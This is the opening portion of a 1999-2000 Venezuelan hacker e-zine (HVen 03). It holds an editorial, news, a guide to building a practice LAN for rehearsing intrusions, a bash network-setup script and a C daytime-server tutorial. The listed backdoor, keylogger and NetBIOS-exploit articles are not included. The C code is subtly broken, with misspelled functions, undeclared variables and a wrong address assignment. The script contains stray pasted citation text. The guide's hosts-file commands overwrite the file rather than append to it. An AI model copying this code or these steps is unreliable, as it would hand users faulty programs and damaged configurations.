Home E-Zines Hven Hven 03

Ultimos Mensajes del Foro

Manual Aleatorio

El mundo del hacker

Documento en el que se analiza a los hackers y su comportamiento.
Leer más...
Hven 03 PDF Imprimir E-mail
Martes, 30 de Noviembre de 1999 01:00
HVLAN, Linux Networking, Compilando el kernel II, Programacion en Batch II, MP3-Linux, Backdoors, Tips para entretener a la masa mundana, Proyecto HVLinux, info I Love You, Entrevista RFP, Sistemas Operativos 100% Seguros II, Server Side Includes (SSI) en Linux, keylog! 2.5, Explotando NetBIOS desde Linux, Hack Motorola.....

Texto Completo:
                        ͻ  
͹   HVen  E-Zine ۲  ͻ
                       ͼ                          
                                                                               
                                                                 
                                                                 
                                                                  
                                                                            
                                 ~~0  |_)                                   
                                |(_~|^~~|                                   
                                 TT/_ T"T                                   
                             ^^^^^^^^^^^^^^^^^                              
                        El Primer E-Zine Venezolano                            
͹    
͹  Disclaimer  ͹ 
 El contenido de esta revista electronica tiene una unica finalidad,  la de    
 educar con respecto a  seguridad  informatica y que  posibildades  tenemos    
 para quebrar dicha seguridad, asi como tambien   mencionamos  otros temas, 
 referentes al underground informatico,  ni  el equipo  ni  ninguno de  sus 
 colaboradores se hace responsable de  lo que tu hagas con esta informacion 
 desde ahora solo tu eres responsable de tus actos...                       
ͼ
͹  Powered by Edit del DOS  ͹  

                              Pagina Oficial
                >>  http://www.hven.com.ve  <<

                             
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

                               Canal Oficial
            >>  #Hackers-Venezuela (irc.dal.net)  <<
                          El Conocimiento es Poder

                       >> Ezine Staff  <<

            Combel                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DarKdEaTH                            
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DoctorX                              
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DunkelSeite                          
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Kliber                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Supreme                              
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Teken Melocotoff                     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Tito_C                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

                    >>  Colaboradores  <<

            [C]apon[E]                           
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DrAk0                                
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            KaDiLaC                              
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            kl0nk Manson                         
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 



   ͻ
͹ Contenido 
   ͼ

01  Editorial                                           Combel
02  De Todo un Poco                                     DarKdEaTH
03  HVLAN                                               DoctorX
04  Linux Networking                                    Kliber
05  Compilando el Kernel II                             Teken Melocotoff
06  Programacion en Batch II                            Combel
07  MP3-LINUX                                           DoctorX
08  BackDoors                                           Combel - Supreme
09  Tips para entretener a la masa mundana              Teken Melocotoff
10  Proyecto HVLinux                                    DoctorX
11  (INFO) ILOVEYOU                                     DoctorX
12  Entrevista con RFP                                  Tito_C
13  Sistemas Operativos 100% Seguros II                 Teken Melocotoff
14  Server Side Includes (SSI) en Linux                 kl0nk Manson
15  Keylog! 2.5                                         [C]apon[E]
16  Explotando NetBIOS desde Linux                      DrAk0
17  HaCk MoToRoLa                                       KaDiLaC
18  Llaves PGP                                          HVEN
19  Sobre las colaboraciones                            HVEN
20  HVEN RC5 DES                                        HVEN
21  Despedida                                           Combel

   ͻ
͹ Editorial ͹Combel
   ͼ

  Finalmente hemos traido nuestro tercer numero, un poco retardado en lo
  que a su edicion respecta pero aqui esta, concluido.

  Siguen  las adversidades... Venezuela  no  esta pasando por muy buenos
  tiempos, empezando por el gobierno que tenemos, atacando  a la Iglesia
  y al  derecho  de la  Libertad  de  Expresion; y en  segundo  lugar, a
  nuestros afanados amigos de CANTV, quien  quita  con  estos tipos que
  no les interesa el atraso del pais?. Pero aun  asi  seguiremos estando
  aqui  duelale a quien le duela.

  Aun  contamos  con la envidiosa presencia de ciertos detractores en el
  canal IRC que entran solo a nukear y molestar a la gente que habita en
  este, tal es el caso de BIL.. bah, no vale ni la pena mencionarle pues
  todos sabemos quien es y por que tiene akick.

  Les recordamos  que  pueden  enviar comentarios (constructivos) acerca
  del E-Zine  a  la  direccion   <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >  asi  como  tambien
  valiosas colaboraciones en  forma de articulo. Para mayor informacion,
  pueden consultar un peque~o texto que se encuentra al final.

  Ya  los dejo, creo que si sigo hablando no voy a dejar que lean lo que
  viene a continuacion, que esta bastante bueno =D.

   ͻ
͹ De todo un Poco ͹DarKdEaTH
   ͼ

  Hemos tenido  ciertos inconvenientes  al momento de  publicar  nuestro
  tercer numero  pero aunque  llueve  truene o caigan  rayos ;) este  ha
  salido a la red, somos mas fuertes que el odio huh! }:->

  En este numero he contado con la valiosa ayuda de el pana Combel quien
  se ha encaragado de ayudarme con  la edicion de la revista, ademas  de
  los miembros del equipo HVEN como Kliber, DoctorX, Teken, Dunkel, etc,
  quienes siempre estan presente de alguna u otra forma.

  El  movimiento hack  en Venezuela cada vez se hace sentir un poco mas,
  una muestra de ello, el articulo principal de una conocida revista  de
  circulacion  semanal con un periodico, en el cual  hablan entre  otras
  cosas del sistema de la UCV que supuestamente es muy seguro.. jeje eso
  no parece  concordar  mucho con  lo que  he oido  ultimamente  en  las
  noticias  under  aca en Venezuela segun dicen por ahi varios admins de
  SOs IRIX y Linux  estan  caminando  estilo  vaquero, ellos  sabran por
  que ;)

  Tambien queremos felicitar desde aca a un nuevo grupo llamado 0ri0n el
  cual entra por la puerta grande con una pagina de noticias actualizada
  regularmente y bastante de pinga, buen  trabajo del  Webmaster  (kl0nk
  Manson), y esperamos que  pronto  salga a la luz su  ezine, ya tenemos
  competencia en el pais ;)

  [ Combel: Ultima! CANTV  ha sacado una maravillosa tarifa plana  desde
    las 2000 (8:00PM) hasta las 800 (8:00AM) en la  cual  el  acceso  al
    90002000 es gratuito...

    Explicacion: El  27  de  Noviembre  se  aprueba  la  Apertura de las
                 Telecomunicaciones  en Venezuela por lo cual apareceran
                 nuevas  entidades  que le van a dar palo y palo seguido
                 a  CANTV =P. En  fin, estan  como tabla de gallinero. ]
                                                      
  Con respecto a nuestra  gran  REPUBLICA BOLIVARIANA, bueno... como que
  seguimos en lo mismo, los borregos le dieron otro chance  mas al  Loco
  Hugo, esta vez votar era muy  dificil pq el candidato  de la oposicion
  (Arias Cardenas) al  parecer esta  mas loco que Chavez, plop!!! aunque
  usted no lo crea, esperemos que ahora  Chavez deje un poco las cadenas
  por television y trabaje mas, mucha gente esta vuelta loca viajando al
  exterior pq  creen que  va a haber una guerra  civil y tal y que se yo
  pero creo que no llegara hasta tanto, de todas maneras como muchos soy
  de los que aqui  nacieron y aqui moriran pase lo que pase, bueno ya no
  sigo mareandolos con tanta paja y les dejo que  revisen  nuestro ezine
  que esta  bastante fino, en  esta  edicion  soy  relevado  por  Combel
  como  editor y me  autobautizo como co-editor, no se que pasara en los
  proximos numeros pero si se que  no  voy a abandonar el ezine, saludos
  y nos vemos por ahi.

 [ Combel: Eh!... Vieron  el  enfrentamiento  en Cojedes donde salio un
   gordo  adeco  que saco un revolver y le metio dos tiros a uno de esos
   "bolivarianos"... lo  mas  de pinga fue que lo grabaron completico en
   la cara cuando se guardo la escuadra y salio pirado XD.

    En mis sinceras opiniones... el fraude fue todo un INRI. ]

   Y felicidades a Teken Melocotoff por el nacimiento de su hija AMY!
   Por parte de todo el equipo de HVen. "Felicidades!".


   ͻ
͹ HVLAN ͹DoctorX
   ͼ
                ===========================================
                =  HVLinux V0.2.2  http://hvlinux.tsx.org =
                =  LabX - http://labx.tsx.org             =
                =  DoctorX <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >         =
                ===========================================

Titulo: HVLAN
Autor : DoctorX
Fecha : No Recuerdo
Publicada : http://labx.tsx.org

  HV-LAN es una iniciativa que nacio entre los  integrantes de HVen para
  formar una LAN (Local Area Network) para poder asi practicar exploits,
  tecnicas de intrusion, hacking, jugar al administrador de la red jeje,
  votar piedra realizando  configuraciones e intercambiar informacion  y
  archivos  a  10Mbps.  Ademas  de  instalar  y  recontra  instalar  las
  distribuciones de  Linux  que  teniamos a la mano. El primer paso para
  montar  nuestra  LAN  fue el comprar por supuesto las tarjetas de Red.
  Pueden  ser  pnp  o  no, las pnp  son un  poco  mas  fastidiosas  para
  configurar pero que se hace hay darle a lo que salga :-) al comprar tu
  tarjeta de red fijate que tenga la posibilidad de utilizar utp y cable
  coaxial  para  que sea mas  versatil  luego de esto debimos comprar el
  cable coaxial (no  utilizamos utp porque  hacia falta  un concentrador
  :-{ ) nos decidimos por el RG-58 que te permite alcanzar una velocidad
  de transmision  de  datos  de 10Mbps, pa  que  mas!!!!!!! (yo compre 7
  metros jeje) tambien  existe  el RG-59 que  creo que  permite alcanzar
  100Mbps pero bueno ya con este teniamos de todas  formas si uno quiere
  otro cable solo basta  con remitirse a los catalogos  de fabricantes y
  listo, si  uno  elige  comprar  cable utp el mas recomendado es el UTP
  nivel 5.          


                Configuracion de las Tarjetas Ethernet
                ======================================

Linux:
======

  Primero se debe elegir un IP para la red, se dice que  los mejores IPs
  de  prueba  son  algo asi  como esto: 10.10.10.10 y  mascara  de red o
  netmask 255.255.255.0, lo  que  sucede  es  que  en  redes  tipo C las
  mascaras comienzan a partir de 255.255.0.0, y para  el resto  les toca
  investigar.


  Supongan que  elegimos  como IP para la red: 180.2.45.0 y como  en  la
  primera  oportunidad  se  desea  conectar 3  maquinas  que  llamaremos
  hellstar, darkstar y drake. Ahora les asignamos los IPs a las maquinas
  como se muestra a continuacion:


180.2.45.1  hellstar
180.2.45.4  darkstar
180.2.45.2  drake


  Para configurar las tarjetas ethernet se debe ser root y se hace  asi:

  Si no tienes el controlador para la ethernet cargado lo cargas asi

#lsmod  <====== te dice que modulos estan cargados

#modprobe ne io=direccion 

  Suponiendo  que  tu  tarjeta  es compatible  con ne2000  el  modulo  a
  utilizar es  el "ne" pero  le debes  especificar  una  direccion, para
  saber  que direcciones estan disponibles le das:

# cat /proc/ioports

0000-001f : dma1
0020-003f : pic1
0040-005f : timer
0060-006f : keyboard
0070-007f : rtc
0080-009f : dma page reg
00a0-00bf : pic2
00c0-00df : dma2
00f0-00ff : npu
01f0-01f7 : ide0
0280-029f : NE2000
02f8-02ff : serial(auto)
03c0-03df : vga+
03e8-03ef : serial(set)
03f0-03f5 : floppy
03f6-03f6 : ide0
03f7-03f7 : floppy DIR
03f8-03ff : serial(auto)

  Aca se puede ver que tengo la ethernet  instalada en  el puerto 0x0280
  en donde aparece NE2000.

  Nota: Puede  ser que tu  kernel ya tenga el soporte  instalado  por lo
  cual no te hace falta utilizar modprobe pero de  todas formas no  esta
  demas  probar, y si te da error  entonces debes  recompilar el  kernel
  para  agregar  el soporte  de red  como  un modulo  pero  eso es  otro
  problema.

  Ok, ahora debemos configurar las tarjetas de red.

# ifconfig eth0 180.2.45.1 netmask 255.255.255.0 

  Si tienes el soporte necesario para la ethernet todo estara bien de lo
  contrario te dara un error.

  Ahora si  quieres  hacerlo  de manera menos  manual puedes ejecutar el
  siguiente shell script.

------------------------------ ethernet.sh --------------------------------
#!/bin/bash
export IP=jumi
export MASCARA=[*3] [http://www.govannom.org/e-zines/hven/hven003.txt]
export MASCARA_POR_DEFECTO="255.255.255.0"
ECHO="/bin/echo"
export RED_CONF="/sbin/ifconfig"
export ETHERNET="eth0"
export mem1="Hackers Venezuela "
export mem2="Configuracion de Ethernet"
export mem3="By DoctorX email: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 "
export mem4="Faltan Parametros"
export mem5="uso:  {jumi [*3] [http://www.govannom.org/e-zines/hven/hven003.txt]} tu_IP mascara_de_red"
export mem6="tu_IP          : es el IP que le daras a tu maquina"
export mem7="mascara_de_red : mascara de la red, es opcional por defecto $MASCARA_POR_DEFECTO " 
export mem8="IP local       : $IP  "
export mem9="Mascara de red : $MASCARA_POR_DEFECTO  "
solo="Solo Root puede Configurar La Ethernet"
export
linea="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" 
function etherconf() { 
              echo $linea
                echo $mem1
                echo $mem2
                echo $mem3
                echo $linea
                echo $mem8
                echo $mem9
                echo $linea
                $RED_CONF $ETHERNET $IP netmask $MASCARA_POR_DEFECTO ;  }
function etherconf2() { 
              local mem10="Mascara de Red : $MASCARA "
                echo $linea
                echo $mem1
                echo $mem2
                echo $mem3
                echo $linea
                echo $mem8
                echo $mem10
                echo $linea
                $RED_CONF $ETHERNET $IP netmask $MASCARA ;  }
function mem() { 
               echo $linea
               echo $mem1 
               echo $mem2
               echo $mem3
               echo $linea
               echo $mem5
               echo $mem6
               echo $mem7
               echo $linea
               exit  ; }

#if [ "$USER"!="root" ] ; then
#     echo $solo
#     exit 
#fi
case $#  in 0 ) mem ;;
            1 ) etherconf ;;
            2 ) etherconf2 ;
esac
------------------------------ ethernet.sh --------------------------------

  Para  ejecutarlo  debes cortar  el  shell   script  y  guardarlo  como
  ethernet.sh o podrias grabarlo como  ethernet  simplemente o el nombre
  que mas te  guste luego hace lo siguiente:

#chmod  700 ethernet.sh

#./ethernet.sh  

  o tambien 

# chmod 700 ethernet
 
# ./ethernet

  Y te dira como trabaja

  Ahora ya configurada la tarjeta  ethernet.

  Existen  multiples  tecnologias  para  redes,  aca  solo  describo  la
  de ethernet porque es el estandar de mas amplio uso hoy en dia.

        Topologia de Bus:
        =================

  En esta  topologia la filosofia es distinta que en la anterior ya  que
  en  esta  todas  las  maquinas se  agregan a un bus  principal  y  las
  maquinas que  estan en  los extremos del BUS deben tener terminaciones
  (terminators) de 50 ohmios  ya que si no es asi entonces los pulsos se
  quedan rebotando en la red sin llegar a su destino.

  Ejm:

   T1T2  <== BUS
                                                        
      Ŀ         Ŀ        Ŀ
         Drake             HellStar          DarkStar 
                       
       180.2.45.2            180.2.45.1          180.2.45.5


  T1 y T2 son  las dos  terminaciones  de 50 ohmios  en los extremos del
  BUS, la maxima distancia entre las maquinas  del bus es de 500 metros,
  cada maquina se une al BUS mediante una conexion tipo T.

  Ahora una vez que se elige la topologia y se realizan  las  conexiones
  necesarias  solo  queda hacer un "ping" al resto de las maquinas en la
  red para ver si no hay problemas con los cables.

# echo "180.2.45.5  darkstar.hven.org darkstar " > /etc/hosts
# echo "180.2.45.2  drake.hven.org  drake" > /etc/hosts
# ping  drake

  Si les aparece una respuesta como esta:

PING DRAKE (180.2.45.2) :56 data bytes
64 bytes from 180.2.45.2 :icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 180.2.45.2 :icmp_seq=1 ttl=64 time=0.1 ms 
64 bytes from 180.2.45.2 :icmp_seq=2 ttl=64 time=0.1 ms            
64 bytes from 180.2.45.2 :icmp_seq=3 ttl=64 time=0.1 ms              
64 bytes from 180.2.45.2 :icmp_seq=4 ttl=64 time=0.1 ms
64 bytes from 180.2.45.2 :icmp_seq=5 ttl=64 time=0.1 ms               


  Entonces yes!!!!!!!!!!! la red  esta  viva claro  todo esto despues de
  configurar  las tarjetas  ethernet para  cada maquina  que  en nuestra
  primera   reunion  estaban  un  rato  en  Linux  y  otro  en  Win9X/NT
  dependiendo  del  gusto  de la gente, si  no les  aparece  esto  deben
  revisar la configuracion de los IPs y las mascara de red ademas de que
  deben tener todas el mismo broadcast en nuestro caso 180.2.255.55,  si
  hay problema hay que verificar que los terminales del cable esten bien
  hechos ademas de que cada conector BNC que este en las maquinas de los
  extremos del bus debe tener una terminacion de 50 ohmios.


        Win9X/NT
        ========
 
  Bueno bueno nunca falta algun amigo del Win y quiera hacer  algo en la
  LAN. Asi  que lo  primero que  necesitas los drivers para  la  tarjeta
  ethernet, estos  drivers  deben ser suministrados por el fabricante de
  la tarjeta  ethernet  muchas  veces a  traves de un disco 3 y . Si no
  tienes  la tarjeta  ethernet  instalada  debes  darle  en  el panel de
  control la  opcion  agregar  nuevo hardware, al pulsar  agregar  nuevo
  hardware te preguntara si quieres que la detecte automaticamente, alli
  selecciona no y luego siguiente, el  proximo dialogo te  preguntara el
  tipo de hardware que  deseas  instalar alli debes escoger "Adaptadores
  de Red" y luego siguiente, en este punto le  saldra  una  lista de los
  controladores  disponibles  si  usted  conoce bien el  tipo de tarjeta
  puede intentar escoger  usted  mismo el  driver si no  entonces  pulse
  "utilizar  disco"  y  busque  el  driver  en  un  3 y   que  debe ser
  suministrado  por  el  fabricante.  Una  vez instalada  la  tarjeta de
  ethernet   debe   proceder  a  configurar  la   tarjeta   con   el  IP
  correspondiente y la mascara  de red para ello debes darle al icono de
  "Entorno de Red" con el boton derecho del mouse, presiona  propiedades
  y alli elige "TCP/IP" y dale propiedades, alli  en la pesta~a que dice
  "direccion IP"  debes  colocar tu IP y la  mascara de  red, despues de
  esto solo  debes reiniciar y al  volver a  arrancar el  win_fuck_9X/NT
  entonces tendras la ethernet funcionando bien y  podras  conectarte al
  resto de las maquinas en linux que esten en la red y  realizar telnet,
  ftp y otras funciones tipicas de una red.

  Especial  agradecimiento  al  HV-TEAM  que  trabajo  en HV-LAN  en sus
  inicios y a hasta la actualidad.

Kliber         ............................................ Sombra
Drake          ............................................ Trident Man
Comisionado    ............................................ Zeus (PornoCD)

War Box                IP         Administrador           SO
==========================================================================
drake.hven.org      180.2.45.2       drake        Win95/Red Hat Linux
darkstar.hven.org   180.2.45.5       kliber  (*)  WinNT/Red Hat Linux
biohazard.hven.org  180.2.45.1      d0ct0r_x (*)  Win95/Red Hat Linux
zeus.hven.org       180.2.45.3     Comisionado    Win95/Red Hat Linux

(*) Administradores de HV-LAN

DoctorX
"El Conocimiento es el Poder"
<
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
http://www.hven.com.ve  Hackers Venezuela
http://labx.tsx.org     Zona de Bacterias - LabX
http://hvlinux.tsx.org  HVLinux
flames enviarlos a /dev/null 
Comentarios enviarlos a: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 




   ͻ
͹ Linux Networking ͹Kliber
   ͼ

        Introduccion
        ============

  Cuando nos sentamos  frente a un PC y nos conectamos tranquilamente  a
  la Internet, no  pensamos  en la  intrincada y compleja  forma  en que
  nuestra  computadora  se comunica con  miles de  otras  maquinas en el
  mundo; la manera  en como se transmite y se recibe data a traves de la
  Red   Internacional;  solo   "navegamos",  inconscientes  de  toda  la
  tecnologia  que  le da forma  al "Cyber Espacio", ese Vacio conformado
  por millones de conexiones, cables, chips y software. 

  Para  comprender  mejor a la  Internet, debemos  estudiar  un area muy
  extensa llamada "NetWorking" (trabajo en redes), la internet no es mas
  que  un gigantesco  conglomerado  de  Redes  de  distintos  tipos,  el
  conocimiento  basico  del  comportamiento  de las  redes, nos dara muy
  buenas bases para el estudio de la seguridad de las mismas.

  La mayoria de las aplicaciones en redes podemos dividirlas  facilmente
  en dos piezas diferentes: un cliente y un servidor. Entre el cliente y
  el servidor, existe en determinado momento en el  cual se efectua  una
  comunicacion   entre  estas   dos  piezas:  el  "Link"  o  "camino  de
  comunicacion".

  Dependiendo  del tipo  de aplicacion, este "Link" puede ser momentaneo
  (como  en el caso del cliente y servidor web, unos cuantos segundos) o
  puede  durar  minutos,  horas e  incluso  dias  (como  bajar  archivos
  grandes, hacer  Telnet, las  particiones NFS y otras aplicaciones como
  el caso de los Bots de IRC). Conocemos distintos tipos de aplicaciones
  "cliente-servidor" con las  cuales interactuamos  a menudo  cuando nos
  conectamos a la Internet: Browsers, Webservers, FTP, Telnet, ICQ, etc.

  Estas aplicaciones utilizan "Protocolos" que  desde un punto  de vista
  "humano", podemos  compararlo  con  los  idiomas  que  utilizamos para
  comunicarnos  con otras  personas. En  Internet, existe  diversidad de
  protocolos  para  comunicarse  diferentes  aplicaciones  pero  el  mas
  conocido es  la  "Suite Internet": los  Protocolos  TCP/IP  (Transport
  Control Protocol/Internet Protocol), estos dos  protocolos interactuan
  entre si  para establecer  el "Link" entre  un Cliente  y un Servidor,
  este Link de comunicacion esta  conformado por cuatro "Layers" (Capas)
  conocidas como:

  * Application Layer (Capa de aplicacion): En la cual se encuentran los
    tipicos  procesos  de  usuarios  (por ejemplo  una  solicitud  de un
    Cliente FTP a un servidor).

  * Transport Layer (Capa de Transporte): (Protocolo TCP).

  * Network Layer (Capa de Red): (Protocolo IP).

  * Datalink Layer: (Dispositivo de Red).


  Pero TCP/IP no  son los unicos  protocolos  que encontraremos, algunas
  aplicaciones utilizan UDP (user datagram protocol) en vez de TCP  (por
  ejemplo). Los Protocolos mas  conocidos son: IP (v.4 y v.6), TCP, UDP,
  ICPM, IGPM, ARP, RARP, ICPMv6, BPF, DLPI. Todos estos protocolos estan
  discutidos en  RFCs (Request for Comments) los cuales puedes consultar
  en:

  ftp://ds.internic.net/rfc  (RFC 1700)  (recuerda  buscar  los  numeros
  asignados mas altos, son los mas recientes).

  Ok, ya hemos  estudiado  algo sobre  los  protocolos,  veamos ahora la
  parte  delicada  del  Networking, las  Aplicaciones. Es  mediante  las
  aplicaciones que podemos interactuar con maquinas en Internet, y en el
  aspecto de la  Seguridad, las  aplicaciones se llevan gran parte de la
  responsabilidad; si  una  aplicacion esta deficientemente  programada,
  existe  un  riesgo  alto  de comprometer  un  sistema. Diariamente las
  aplicaciones comerciales (o no  comerciales) son sometidas a complejos
  debuggins  por  parte   de  particulares   alrededor  del  mundo,  una
  subscripcion a  la lista  de  correos  Bugtraq  ilustra  esto de mejor
  manera. :)

  Linux nos ofrece una Plataforma muy poderosa  para el aprendizaje,  ya
  que  desde  el Shell  tenemos a nuestra  disposicion  una  variedad de
  lenguajes de programacion para crear y probar aplicaciones, y estudiar
  detenidamente su comportamiento en un ambiente de redes. En mi opinion
  personal, la mejor  manera de aprender sobre Seguridad de Redes, es la
  creacion y estudio  de este tipo de  aplicaciones, el  famirializarnos
  con  el  codigo   nos  dara  una   mejor  perspectiva   de  su  uso  y
  posibilidades, la capacidad de poder leer codigo  e interpretarlo, nos
  abre las puertas a un nuevo mundo, interesante y divertido. A lo largo
  de esta serie de textos que he llamdo "Networking"  estudiaremos estas
  aplicaciones  cliente-servidor, su  desarrollo y sus  componentes, asi
  como la forma en como Interactuan entre si, entre otros temas...
 
        Programando un Servidor.
        ========================

  En el siguiente ejemplo, veremos un codigo corto y sencillo (lo  mejor
  comentado posible para su facil  interpretacion) que podemos  crear en
  nuestra   estacion  Linux  para   estudiar  las  funciones  y  ordenes
  necesarias para el  funcionamiento  de un peque~o servidor "Day-Time",
  en el observaremos la  creacion de un Socket TCP, la manera en como se
  une este socket a un puerto  especifico,  convertir  este  socket a un
  socket  de   escucha,  aceptar  conexiones  y  envio  de  respuesta  y
  finalmente  terminar la conexion. El  lenguaje  elegido es el Lenguaje
  "C",  (en  el  futuro  estudiaremos  tambien a  Perl  y TCL).  Lo  mas
  interesante  de este codigo, es que nos brinda la posibilidad de jugar
  un poco  con  el, ya sea  haciendo algunos  cambios  (como  cambiar el
  puerto, los mensajes, etc.) dandonos la posibilidad  de adentrarnos un
  poco en el mundo de la programacion de aplicaciones de Redes.

  [ Combel: disculpen por entrometerme en el articulo, pero yo hice  una
    version con los wrappers definidos sin necesidad del  unp.h, el  que
    lo necesite me manda un mail. ]

/*------------- daytimeserv.c --------------*/
/*--(estos son los Headers(*) del Programa)--*/
#include    "unp.h"
#include    

/* Aqui esta la definicion de la funcion "main", con los argumentos de
   la linea de comandos. */
int
main (int argc, char **argv)

  {
        int      listenfd, connfd;
        struct sockaddr_in servaddr;
        char    buff [MAXLINE];
        time_t ticks;

/* La funcion Socket crea un socket TCP, es de hacer notar que Socket
(letra S mayuscula) es un Wrapper definido en unp.h */
        
        listenfd = Socket (AF_INET, SOCK_STREAM, 0);

        bzero (&servaddr, siseof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr = htons(13); /* Servidor Daytime */
        
        Bind(listenfd, (SA *) &servaddr, sizeof(servaddr));
        
        Listen(listenfd, LISTENQ);

        for ( ; ; ) {
                confd = Accept(listenfd, (SA *) NULL, NULL);

                ticks = time(NULL);
                snprintf(buff, sizeof(buff), "%.24s\r\n", ctime(&sticks));
                write(confd, buff, strlen(buff));

                Close(connfd);
        }
  }

/*-------------------- end -------------------*/       

  Por  supuesto, para  entender  mejor este  codigo, hace falta  un buen
  pu~al de  lenguaje C, asi  como un  mejor  conocimiento de como TCP/IP
  maneja los paquetes de data, etc. (pero por algun lado hay que empezar
  no?) :)


  * Headers: Los  Headers  o  encabezados  sirven  para definir  ciertas
    funciones inherentes, son colocados al principio del codigo:

  #include unp.h (Este  es un header "custom" el cual posee unos headers
  standards  que  la mayoria  de los programas  de redes  utilizan, esto
  permite  compilar el codigo en diferentes plataformas *nix, entre esos
  headers  se encuentran  stdio.h, errno.h,  time.h,  stdlib.h, etc. (un
  viaje de headers mas). Esto  ahorra  tiempo a la  hora de  crear nuevo
  codigo, ya que la mayoria de los headers se encuentran aqui definidos,
  esto  nos  evita tener  que  estar  pendientes  que  headers  vamos  a
  necesitar para x aplicacion... (no, tu no lo tienes, debes crearlo; el
  header  unp.h  lo   tomamos  del  Libro:  "Unix  Network   Programing,
  Networking APIs: Sockets and XTI" de W. Richard Stevens, muy  bueno  y
  va recomendado.. :)

        Funciones: 

  Una funcion o rutina  (o como quieras llamarlo)  nos permite tener una
  pieza  de codigo  que podemos  utilizar  en otro programa parecido; en
  este caso, podemos observar la funcion  socket donde creamos el Socket
  TCP;  especificamos  la familia  AF_INET  (Internet)  especificamos la
  direccion IP y el tipo de  interface  que se conectara  a ese  socket:
  INADDR_ANY  (Cualquiera),  especificamos  el puerto a Utilizar:  htons
  (13) (Puerto 13 en este caso, el puerto Daytime) y  luego pegamos esta
  estructura declarada como "listenfd" al puerto utilizando a BIND.

  Ahora modificamos el Socket para convertirlo en un "Listening  Socket"
  (de escucha) llamando a "listen", de esta manera la estructura  espera
  conexiones de clientes que seran  aceptados por el Kernel... los pasos
  "socket" "bind" y "listen" son los pasos normales para que el servidor
  TCP se prepare para lo que  llamaremos "listening descriptor" en  este
  caso "listenfd". En el  ejemplo  existe una constante llamada LISTENQ,
  ella  esta  previamente  definida en  el header; la cual especifica el
  maximo  numero  de   clientes  que  se  conectaran  a  ese  "listening
  descriptor". (asi se llama y asi se queda)

  Por lo general el proceso de un servidor estara "dormido" esperando  a
  un  cliente  que  se  conecte y llame a "accept", con  la  rutina  que
  empieza asi:

for ( ; ; ) {  
 
  El proceso  entra  en un loop esperando  al cliente que establecera la
  conexion, TCP completa el "hand-shake" ("choque de manos", por ejemplo
  cuando tu modem se conecta a un servidor de internet, este "habla" con
  el servidor  hasta  que  se sincronizan y se conectan, eso es un Hand-
  Shake),  "accept"  retorna  el  valor  de  la  funcion  en   un  nuevo
  "descriptor" (connfd)  el  cual  es  usado  para  comunicarse  con  el
  cliente, en el mismo, la funcion libreria "time" devuelve el numero de
  segundos, y funcion la libreria "ctime"  convierte  este integrador en
  un string que puede ser leido por el ojo humano:

Fri May 25 14:30:55 2000

  Luego esa linea es pegada por "snprintf" y el resultado es escrito  al
  cliente por "write"; al final el cliente  llega hasta "close" y listo,
  ya cumplio su mision...

  Todo  lo  anterior   nos  hace  reflexionar  un  poco  acerca  de  las
  capacidades  del codigo; el codigo, no  importando en  que lenguaje ha
  sido escrito; es  simplemente maravilloso...  ya que  nos dice palabra
  por palabra de que es capaz, y nos permite crear cosas nuevas a partir
  de trozos ya  creados, a partir de  combinar lo que  nunca  antes  fue
  combinado...

  Si, ya se  que  la  explicacion acerca del programita anterior es algo
  enredada (incluso,  yo me  enrede  muchisimo  tratando  de explicarlo)
  jeje! sobre  todo por  una  realidad que  surge gracias  a todos estos
  adelantos tecnologicos  en los  que estamos  metidos de cabeza: Nuevas
  palabras, Nuevas cosas con  extranos  nombres,  simplemente hay nuevas
  cosas que hay que llamarlas por su nombre, y para entenderlas, tenemos
  que primero estudiarlas y comprenderlas...

  Desde un punto de vista Filosofico, la vida ha cambiado tal cual  como
  la  conociamos;  poco  a poco  la  humanidad se  dara cuenta que hemos
  llegado  a un nuevo punto muy semejante a la revolucion industrial que
  cambio  los esquemas de la sociedad en los albores del siglo pasado; y
  que indudablemente  cambiara  nuevamente a la  sociedad  tal  cual  la
  conocemos:

  La revolucion del Conocimiento...

  Aquellos  que  logren  comprender  la  importancia de  incrementar sus
  conocimientos,  adoptar nuevos  dogmas y explotar  nuevas tecnologias,
  seran los lideres del mundo por venir...

        El Conocimiento es Poder!!!

        Kliber.
        
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


   ͻ
͹ Compilando el Kernel II ͹Teken Melocotoff
   ͼ

                                                                09/04/00

  Antes  que  nada  quisiera  agradecer  a Shaba_Brown, quien fue que me
  motivo a compilar. Si no hubiese jodido tanto y sido tan terco y necio
  nunca me hubiera dedicado a hacerlo! Grax XD!

  ****************************************************************  
  TODA LA INFORMACION QUE APAREZCA AQUI ES SOLO PARA 
  USOS EDUCACIONALES, NI EL AUTOR DEL DOCUMENTO, NI 
  EL RESPONSABLE DEL WEBSITE, SE HARAN RESPONSABLE DE 
